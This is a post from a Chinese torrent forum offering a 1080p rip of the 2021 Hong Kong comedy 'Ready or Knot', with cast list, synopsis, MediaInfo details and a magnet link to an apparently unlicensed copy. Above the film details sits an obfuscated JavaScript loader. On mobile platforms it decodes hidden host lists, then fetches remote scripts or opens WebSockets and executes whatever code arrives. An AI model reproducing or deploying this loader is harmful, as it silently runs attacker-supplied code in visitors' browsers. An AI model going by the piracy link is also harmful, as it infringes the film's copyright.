不日成婚[国语配音].Ready.or.Knot.2021.1080p.BluRay.DD5.1.2Audio.x265-10bit 5.69GB

版主小s 22天前 230

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 不日成婚 / Ready or Knot
◎年  代 2021
◎产  地 中国香港
◎类  别 喜剧 / 爱情
◎语  言 粤语 / 汉语普通话
◎上映日期 2021-04-11(中国大陆) / 2021-04-01(中国香港)
◎IMDb链接 https://www.imdb.com/title/tt14387660/
◎豆瓣评分 5.5/10 (3598人评价)
◎豆瓣链接 https://movie.douban.com/subject/35307509/
◎片  长 104分钟
◎导  演 陈茂贤 Anselm Chan (id:1326295)
◎编  剧 陈茂贤 Anselm Chan (id:1326295)
       郑纬机 Wai Kei Cheng (id:1336854)
◎演  员 陈家乐 Carlos Chan (id:1275972)
       卫诗雅 Michelle Wai (id:1313357)
       朱栢康 Tommy Chu (id:1405539)
       谈善言 Hedwig Tam (id:1366380)
       岑珈其 Kaki Sham (id:1319715)
       杨偲泳 Renci Yeung (id:1374986)
       邵音音 Yin-Yin Shaw (id:1297367)
       冯勉恒 Min Hun Fung (id:1322425)
       谷德昭 Vincent Kok (id:1025526)
       许博文 Johnny Hui (id:1385901)
       梁雍婷 Rachel Leung (id:1371987)
       黎子良 Bernard Lai (id:1438022)
       李绮雯 Yee-Man Lee (id:1353241)
       杨受成 Albert Yeung (id:1313455)
       邵剑秋 Kim-Chau Shiu (id:1413263)
       卫诗雅 Michelle Wai (id:1313357)
       郑纬机 Wai Kei Cheng (id:1336854)
       戴伟 Day Tai (id:1337786)
       邝志良 Chi-Leung Kwong (id:1289164)
       利碧君 Pik Kwan Lee (id:1289693)
       陈迪凯 Water Chan Tik-Hoi (id:1345570)

◎标  签 爱情 / 香港电影 / 香港 / 港产片 / 2021 / 喜剧 / 电影 / 陈家乐

◎简  介
  阿佳 (陈家乐 饰)与可怡(卫诗雅 饰)在一个婚礼上相识,两人一拍即合,相爱五年,终于迎来最大的感情危机-“结婚”!女方视结婚为爱的证明;男方视结婚为爱的坟墓,二人在这议题上互有攻守,展开了一场男女之间深层次的角力! 可怡的闺蜜Jenny  (谈善言 饰)与Jessica  (杨偲泳 饰) 出谋献策,教她奇招务求怀孕上身!一旦怀孕,婚事不就势在必行?!阿佳眼见可怡对自己展开“逼婚计划”,惟有在兄弟灰熊(朱栢康 饰)与阿健(岑珈其 饰) 的帮忙下积极迎战,誓要坚守不婚底线! 女方计谋被连番识破,Jessica只好掏出杀着-春药!得知消息的灰熊冒着生命危险通风报信,阿佳虽已有所防范,但还是百密一疏,中了可怡的圈套,渡过了极爽快的“无套一夜”!事后阿佳提心吊胆,最反对结婚的浪子阿健立即提出“事后大行动”— 务求在黄金三十六小时内,将事后避孕丸偷偷让可怡服下...

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 227700602599494570787731744116308602193 (0xAB4D8A77C6AF71DCECAC36B4E5BA6D51)

  4. Complete name                            : [email protected]QDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 5.68 GiB

  8. Duration                                 : 1 h 44 min

  9. Overall bit rate                         : 7 767 kb/s

  10. Movie name                               : Ready or Knot 2021 1080p BluRay DD5.1 2Audio [email protected]

  11. Encoded date                             : UTC 2021-08-23 00:12:02

  12. Writing application                      : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library                          : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID                                       : 1

  16. Format                                   : HEVC

  17. Format/Info                              : High Efficiency Video Coding

  18. Format profile                           : Main [email protected]@High

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 44 min

  21. Bit rate                                 : 6 452 kb/s

  22. Width                                    : 1 920 pixels

  23. Height                                   : 1 080 pixels

  24. Display aspect ratio                     : 16:9

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 24.000 FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.130

  31. Stream size                              : 4.72 GiB (83%)

  32. Title                                    : [email protected]

  33. Writing library                          : x265 - H.265/HEVC codec

  34. Default                                  : Yes

  35. Forced                                   : No


  36. Audio #1

  37. ID                                       : 2

  38. Format                                   : AC-3

  39. Format/Info                              : Audio Coding 3

  40. Commercial name                          : Dolby Digital

  41. Codec ID                                 : A_AC3

  42. Duration                                 : 1 h 44 min

  43. Bit rate mode                            : Constant

  44. Bit rate                                 : 640 kb/s

  45. Channel(s)                               : 6 channels

  46. Channel layout                           : L R C LFE Ls Rs

  47. Sampling rate                            : 48.0 kHz

  48. Frame rate                               : 31.250 FPS (1536 SPF)

  49. Compression mode                         : Lossy

  50. Stream size                              : 480 MiB (8%)

  51. Title                                    : Mandarin

  52. Language                                 : Chinese

  53. Service kind                             : Complete Main

  54. Default                                  : Yes

  55. Forced                                   : No


  56. Audio #2

  57. ID                                       : 3

  58. Format                                   : AC-3

  59. Format/Info                              : Audio Coding 3

  60. Commercial name                          : Dolby Digital

  61. Codec ID                                 : A_AC3

  62. Duration                                 : 1 h 44 min

  63. Bit rate mode                            : Constant

  64. Bit rate                                 : 640 kb/s

  65. Channel(s)                               : 6 channels

  66. Channel layout                           : L R C LFE Ls Rs

  67. Sampling rate                            : 48.0 kHz

  68. Frame rate                               : 31.250 FPS (1536 SPF)

  69. Compression mode                         : Lossy

  70. Stream size                              : 480 MiB (8%)

  71. Title                                    : Cantonese

  72. Language                                 : Chinese

  73. Service kind                             : Complete Main

  74. Default                                  : No

  75. Forced                                   : No


  76. Text #1

  77. ID                                       : 4

  78. Format                                   : PGS

  79. Muxing mode                              : zlib

  80. Codec ID                                 : S_HDMV/PGS

  81. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  82. Duration                                 : 1 h 42 min

  83. Bit rate                                 : 44.0 kb/s

  84. Count of elements                        : 2918

  85. Stream size                              : 32.1 MiB (1%)

  86. Title                                    : CHS

  87. Language                                 : Chinese

  88. Default                                  : Yes

  89. Forced                                   : No


  90. Text #2

  91. ID                                       : 5

  92. Format                                   : PGS

  93. Muxing mode                              : zlib

  94. Codec ID                                 : S_HDMV/PGS

  95. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  96. Duration                                 : 1 h 41 min

  97. Bit rate                                 : 44.7 kb/s

  98. Count of elements                        : 2909

  99. Stream size                              : 32.6 MiB (1%)

  100. Title                                    : CHT

  101. Language                                 : Chinese

  102. Default                                  : No

  103. Forced                                   : No


  104. Menu

  105. 00:00:00.000                             : en:Chapter 01

  106. 00:04:08.958                             : en:Chapter 02

  107. 00:19:24.958                             : en:Chapter 03

  108. 00:26:24.417                             : en:Chapter 04

  109. 00:35:26.417                             : en:Chapter 05

  110. 00:45:41.375                             : en:Chapter 06

  111. 00:52:22.500                             : en:Chapter 07

  112. 01:02:19.333                             : en:Chapter 08

  113. 01:09:03.875                             : en:Chapter 09

  114. 01:17:23.708                             : en:Chapter 10

  115. 01:29:53.500                             : en:Chapter 11

  116. 01:37:00.333                             : en:Chapter 12



TAGS 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:B657C8B20099023CBF43AF8568D851994E9F1881
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回